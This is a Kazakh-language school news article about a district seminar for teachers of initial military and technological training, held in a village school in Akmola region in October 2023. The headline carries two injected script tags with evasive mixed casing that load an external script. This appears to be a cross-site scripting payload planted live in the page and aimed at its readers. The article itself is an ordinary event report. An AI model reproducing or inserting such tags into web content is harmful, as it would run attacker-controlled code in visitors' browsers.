Алғашқы әскери және технологиялық дайындық пәнінің оқытушы-ұйымдастырушыларының қатысуымен аудандық семинары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.10.2023

«Ақмола облысы Целиноград ауданының Қараөткел ауылы №1жалпы орта білім беретін мектебі» КММ бойынша 19 қазан 2023 жылы Алғашқы әскери және технологиялық дайындық пәнінің оқытушы-ұйымдастырушыларының қатысуымен аудандық семинары болып өтті .

Семинарға  келген қонақтарды қарсы алып, мектеп Акт залында семинардың ашылуы өтті. Келген қонақтарға семинардың бағдарламасы  таныстырылып, мерекелік  ән-шашу тарту етілді. Семинар барысында АӘТД пәнінің оқытушы ұйымдастырушысы Талғат Нуршарив «Мотоатқыштар мен танк бөлімшелерін қорғау» тақырыбында ашық сабақ көрсетсе,дене шынықтыру пәнінің мұғалімі Алек Хасен « Мен әскерге дайынмын» тақырыбында эстафеталық жарыс өткізді. Сонымен қатар семинар барысында 25қазан Республика күніне орайластырылған ашық тәрбие сағаттары көрсетілді. Семинар соңында мектептің  тренер ұстазы Умирхан Айнаш семинарға қатысушы ұстаздармен « Ұстазы жақсының ұстамы жақсы » тақырыбында коучинг өткізіп,семинарға қатысушылар өз ой пікірлерімен рефлексия жасап, қорытындылады.

Просмотров: 2764


Пікір қосу



Деректерді қолтаңбаға қосу